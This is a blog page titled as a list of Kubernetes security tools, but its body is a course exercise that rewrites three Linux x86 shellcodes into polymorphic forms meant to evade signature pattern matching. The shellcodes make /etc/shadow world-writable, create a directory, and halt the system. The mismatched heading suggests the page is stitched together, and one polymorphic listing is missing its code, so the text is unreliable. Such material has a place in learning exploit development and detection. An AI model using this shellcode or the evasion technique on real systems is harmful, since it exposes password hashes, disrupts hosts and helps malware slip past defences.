Kubernetes Security Tools
This post lists out popular K8s security tools. The list will be updated regularly.
- Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat paLern matching - The polymorphic versions cannot be larger 150% of the exisSng shellcode - Bonus points for making it shorter in length than original
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1017
We need to modify 3 shellcodes from shellstorm.org or exploit-db.com so the shellcodes don't look like the original while maintain same functionality.
chmod 666 /etc/shadow
We leveraged arithmetic function such as SUB
/ADD
to replace original code such as /etc/shadow
and 0666
.
We also clear EAX
at beginning of shellcode since we found that when EAX
is non-zero, it will throw an error.
Link: http://shell-storm.org/shellcode/files/shellcode-566.php
Original | Polymorphic Version |
---|---|
; linux/x86 chmod 666 /etc/shadow 27 bytes ; [email protected] ; 2010-01-15 section .text global _start _start: ; chmod("//etc/shadow", 0666); mov al, 15 cdq push edx push dword 0x776f6461 push dword 0x68732f63 push dword 0x74652f2f mov ebx, esp mov cx, 0666o int 0x80 |
; linux/x86 chmod 666 /etc/shadow 37 bytes |
mkdir()
Link: http://shell-storm.org/shellcode/files/shellcode-542.php
Instead of using JMP-CALL-POP
method, we directly push the string into stack.
We also removed exit
syscall to save space.
The shellcode size decreased from 36 bytes to 24 bytes.
Original | Polymorphic Version |
---|---|
section .text global _start _start: jmp short call_shellcode shellcode: pop esi xor eax,eax mov [esi+0x6],al mov al,0x27 lea ebx,[esi] mov cx,0x1ed int 0x80 mov al,0x1 xor ebx,ebx int 0x80 call_shellcode: call dword shellcode push dword 0x656b6361 fs db 0x23 |
section .text global _start _start: pop esi xor eax,eax push eax push dword 0x2f2f7265 push dword 0x6b636168 mov al,0x27 mov ebx,esp mov cx,0x1ed int 0x80 |
shutdown()
We leveraged arithmetic function such as SUB
/ADD
to replace original code such as /bin/shutdown
.
The size increased from 30 bytes to 41 bytes.
Link: https://www.exploit-db.com/exploits/37289/
Original | Polymorphic Version |
---|---|
section .text global _start _start: xor eax,eax push eax push dword 0x746c6168 push dword 0x2f2f6e69 push dword 0x62732f2f mov ebx,esp push eax mov edx,esp push ebx mov ecx,esp mov al,0xb int 0x80 |
section .text global _start _start: xor eax,eax push eax mov ecx, 0x11111111 add ecx, 0x636b5057 push ecx sub ecx, 0x453cf2ff push ecx add ecx, 0x3343c0c6 push ecx mov ebx,esp push eax mov edx,esp push ebx mov ecx,esp mov al, 0xb int 0x80 |
The system shutdown after we executed the command.